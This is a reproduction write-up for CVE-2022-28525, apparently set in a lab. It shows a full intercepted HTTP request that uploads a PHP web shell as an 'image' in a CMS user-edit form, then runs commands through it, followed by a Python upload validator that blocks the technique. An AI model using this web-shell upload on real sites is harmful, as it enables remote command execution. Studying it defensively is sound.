CVE-2022-28525 vulnerability reproduction

Open the site and log in to the admin panel with a weak password. On the page that lists all users choose Edit, fill in the password and upload an image, then intercept the request with Burp and modify the packet data as follows:
```http
POST /admin/users.php?source=edit_user&id=41 HTTP/1.1
Host: eci-2ze7imrqnzyoh14zc2sz.cloudeci1.ichunqiu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------396960047138329295911294569074
Content-Length: 1611
Origin: http://eci-2ze7imrqnzyoh14zc2sz.cloudeci1.ichunqiu.com
Connection: close
Referer: http://eci-2ze7imrqnzyoh14zc2sz.cloudeci1.ichunqiu.com/admin/users.php?source=edit_user&id=41
Cookie: Hm_lvt_2d0601bd28de7d49818249cf35d95943=1677721269,1677725166,1677727413; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1677740305; PHPSESSID=h0o3im4t5hfjvfhp41utjdv3qf
Upgrade-Insecure-Requests: 1

-----------------------------396960047138329295911294569074
Content-Disposition: form-data; name="user_id"

41
-----------------------------396960047138329295911294569074
Content-Disposition: form-data; name="user_uname"

admin
-----------------------------396960047138329295911294569074
Content-Disposition: form-data; name="user_email"

admin@aaa.com
-----------------------------396960047138329295911294569074
Content-Disposition: form-data; name="user_pass1"

admin
-----------------------------396960047138329295911294569074
Content-Disposition: form-data; name="user_pass2"

admin
-----------------------------396960047138329295911294569074
Content-Disposition: form-data; name="user_fname"

admin
-----------------------------396960047138329295911294569074
Content-Disposition: form-data; name="user_lname"

admin
-----------------------------396960047138329295911294569074
Content-Disposition: form-data; name="user_image"

new
-----------------------------396960047138329295911294569074
Content-Disposition: form-data; name="new_image"; filename="test.php"
Content-Type: application/octet-stream

shell!<?php system($_GET[l]);?>
-----------------------------396960047138329295911294569074
Content-Disposition: form-data; name="user_role"

Administrator
-----------------------------396960047138329295911294569074
Content-Disposition: form-data; name="user_status"

Active
-----------------------------396960047138329295911294569074
Content-Disposition: form-data; name="updateusersubmit"

-----------------------------396960047138329295911294569074--
```
Then submit the upload and return to the original page: the image does not display properly, because the server stored the uploaded file as-is without checking its name or its content. Look up the image's address, open it directly, and execute a command with ?l=ls /
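As an added, defender-side example that is not part of this write-up or of the CMS: a minimal multipart/form-data parser plus the server-side check the user-image handler should have applied, run over a constructed body shaped like the intercepted request (the names ALLOWED_EXT, MAGIC, parse_multipart and check_image_upload are hypothetical, and the PHP payload is replaced by a harmless stand-in).

```python
# Added example (not from the write-up); all names here are hypothetical.
import re

ALLOWED_EXT = {"png", "jpg", "jpeg", "gif"}
# Leading bytes of the formats the allow-list admits; the client-supplied
# Content-Type header is ignored because it is attacker-controlled.
MAGIC = (b"\x89PNG\r\n\x1a\n", b"\xff\xd8\xff", b"GIF87a", b"GIF89a")


def parse_multipart(body: bytes, boundary: str) -> list[dict]:
    """Minimal multipart/form-data parser: one dict per part with the field
    name, the filename (None for plain fields) and the raw data."""
    parts = []
    for chunk in body.split(b"--" + boundary.encode())[1:]:
        if chunk.startswith(b"--"):        # "--boundary--" closes the body
            break
        head, sep, data = chunk.lstrip(b"\r\n").partition(b"\r\n\r\n")
        if not sep:                        # malformed part: no header block
            continue
        head = head.decode("latin-1")
        name = re.search(r'(?<!\w)name="([^"]*)"', head)
        fname = re.search(r'filename="([^"]*)"', head)
        parts.append({"name": name.group(1) if name else None,
                      "filename": fname.group(1) if fname else None,
                      "data": data.removesuffix(b"\r\n")})
    return parts


def check_image_upload(part: dict) -> tuple[bool, str]:
    """Accept a file part only if its extension is allow-listed AND its bytes
    begin with a known image signature; otherwise return the reason."""
    fname = part.get("filename") or ""
    ext = fname.rsplit(".", 1)[-1].lower() if "." in fname else ""
    if ext not in ALLOWED_EXT:
        return False, f"extension {ext!r} is not an allowed image type"
    if not part["data"].startswith(MAGIC):
        return False, "content does not start with an image signature"
    return True, "ok"


BOUNDARY = "---------------------------396960047138329295911294569074"
# Constructed body with the same two parts as the intercepted request.
SAMPLE_BODY = (
    f'--{BOUNDARY}\r\nContent-Disposition: form-data; name="user_image"\r\n\r\nnew\r\n'
    f'--{BOUNDARY}\r\nContent-Disposition: form-data; name="new_image"; '
    f'filename="test.php"\r\nContent-Type: application/octet-stream\r\n\r\n'
    f"<?php echo 'stand-in'; ?>\r\n--{BOUNDARY}--\r\n"
).encode()

VERDICTS = {p["name"]: check_image_upload(p)
            for p in parse_multipart(SAMPLE_BODY, BOUNDARY) if p["filename"]}
```

An accepted file should then be stored under a server-generated name in a directory served with script execution disabled; the extension check alone is bypassable, which is why the signature check and the storage policy go together.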